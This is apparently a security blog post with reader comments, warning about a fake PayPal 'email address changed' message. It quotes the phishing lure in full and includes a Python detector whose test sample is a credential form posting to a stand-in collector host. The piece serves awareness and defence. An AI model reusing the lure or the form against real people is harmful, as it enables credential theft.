Reason to be careful if 'PayPal' says you have changed your email address

Filed Under: Data loss, Phishing, Spam

Have you received a notification claiming that your PayPal email address has changed?

Messages like the following have been spammed out to internet users:


Subject: You have changed your PayPal email address

Attachment: Personal Profile Form - PayPal-.htm

Message body:
Dear PayPal Customer,

You have added [EMAIL ADDRESS] as a new email address for your Paypal account.

If you did not authorize this change, check with family members and others who may have access to your account first. If you still feel that an unauthorized person has changed your email, submit the form attached to your email in order to keep your original email and restore your Paypal account.

NOTE: The form needs to be opened in a modern browser which has javascript enabled (ex: Internet Explorer 7, Firefox 3, Safari 3, Opera 9)

Please understand that this is a security measure intended to help protect you and your account. We apologize for any inconvenience.

If you choose to ignore our request, you leave us no choice but to temporary suspend your account.

Sincerely, PayPal Account Review Department.

Attached to the email is an HTML form (Personal Profile Form - PayPal-.htm) that asks you to enter your personal information.

Of course, the email is not really from PayPal (who would never send you an HTML form via email anyway), and any information you enter will soon be in the hands of phishing cybercriminals.
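For mail administrators, one way to surface messages of this kind is to look inside any attached .htm/.html file for a form and report where it would send the data. The sketch below is an added example, not code from PayPal or from this article; the form markup, the `collector.example` host and the function names are assumptions made for illustration.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: only the subject and attachment name come from the quoted message.
SAMPLE = """\
Subject: You have changed your PayPal email address
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html
Content-Disposition: attachment; filename="Personal Profile Form - PayPal-.htm"

<form method="post" action="http://collector.example/save.php">
<input name="Email"><input type="password" name="Password"></form>
--b1--
"""

class FormFinder(HTMLParser):
    """Record every <form> action and the names of the inputs inside it."""
    def __init__(self):
        super().__init__()
        self.forms = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "fields": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["fields"].append((a.get("name") or "").lower())

def on_brand(host, brand="paypal.com"):
    """True only for the brand domain itself or a genuine subdomain of it."""
    return bool(host) and (host == brand or host.endswith("." + brand))

def html_form_attachments(raw, brand="paypal.com"):
    """List each form found in an .htm/.html attachment and where it posts."""
    findings = []
    for part in email.message_from_string(raw, policy=policy.default).walk():
        name = part.get_filename() or ""
        if part.is_multipart() or not name.lower().endswith((".htm", ".html")):
            continue
        finder = FormFinder()
        finder.feed(part.get_payload(decode=True).decode("utf-8", "replace"))
        for form in finder.forms:
            host = urlparse(form["action"]).hostname
            findings.append({"attachment": name, "post_host": host,
                             "off_brand": not on_brand(host, brand), "fields": form["fields"]})
    return findings
```

A form with no absolute action is also reported as off-brand, since a file opened from disk cannot be posting to the real site through a relative URL.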

PayPal is one of the most phished brands on the internet. Unlike traditional banks, it has a truly global presence, which increases the chances of a scammer successfully hooking a victim when they spam out their attacks en masse.

To its credit, PayPal offers advice about phishing on its website, and has even created a "Can you spot phishing?" challenge to help educate its users about the dangers.

The PayPal website asks that if you receive a spoof email to forward it to their security team.

Make sure that you take care when you receive unsolicited emails, seemingly from PayPal. It could be that in your haste to fix a security problem you are handing your credentials over to a criminal.


9 Responses to Reason to be careful if 'PayPal' says you have changed your email address

  1. artfrankmiami · 1039 days ago

    I think another hint that it's a real email from Pay Pal is that they use your registered name in the heading. "Dear Pay Pal Member" should raise the red flags.

  2. Jonathan Hammond · 1039 days ago

    I've received several spoof PayPal messages. The most recent was telling me about a recent transaction with Skype and suggesting that I may wish to visit the Resolution Centre to challenge it. The link, of course, was phoney. But the message was very good; it really DID look like a message from PayPal.

    The first give-away, of course, was the lack of a personal salutation. Then a quick look at my account showed that there was no such transaction. I forwarded all the messages to PayPal, as they request.

    I wasn't born yesterday, so my first thought is to be suspicious. But, as I said, this was a very well-made spoof. I bet out of every hundred of the thousands or millions that are sent out one will hit home and net the scammer the details he's after.

  3. rvishu · 1039 days ago

    Another give away is poor grammar. Notice this paragraph 'If you choose to ignore our request, you leave us no choice but to temporary suspend your account.' It should have been '....temporarily' instead of temporary. Definitely unprofessional.

  4. mary edwards · 1039 days ago

    Yes, and if you just forward the email to spoof@paypal.com, it can help PayPal with their security.

  5. S. Emerson · 1039 days ago

    One way to combat phishing emails like this is to only use a specific email address for PayPal and other sites that need high security.

    If the notice doesn't come from that email address then it is a phishing email.

    None of the banks or credit cards I deal with have an email address for me. Another precaution I take.

  6. Liz Taylor · 1039 days ago

    I've gotten these many times. Just mouse over the supposed PayPal.com link and it goes to carenchaffee.com ... not PayPal.com. Normally I just delete these but a friend just posted an article warning about the phishing to FB and the link to PayPal for reporting. Luckily I still had one of those emails in my delete box, so I just forwarded it to them. I get these things from Western Union and banks that I have no accounts in quite often. Never click on the links in the emails ... just go to the real main site and see if there are actual messages online for you.

  7. Sunny · 1028 days ago

    I haven't received any such emails till now, though thanks for the awareness. Sunny

  8. Claire · 651 days ago

    Got an email last night, addressed to someone I have never heard of! Spoke to PAYPAL and they asked me to forward it to spoof@paypal.com. If these low lifes are going to try and rip people off at least try and get the basics right!

  9. Jeremy · 509 days ago

    Spotted from a mile away with just one sentence......

    If you choose to ignore our request, you leave us no choice but to temporary suspend your account.

    Learn English first before you try to fraud people. [Expletive deleted.]


About the author

Graham Cluley runs his own award-winning computer security blog, and is a veteran of the anti-virus industry having worked for a number of security companies since the early 1990s. Now an independent security analyst, he regularly makes media appearances and gives computer security presentations. Send Graham an email, subscribe to his updates on Facebook, follow him on Twitter and App.net, and circle him on Google Plus for regular updates.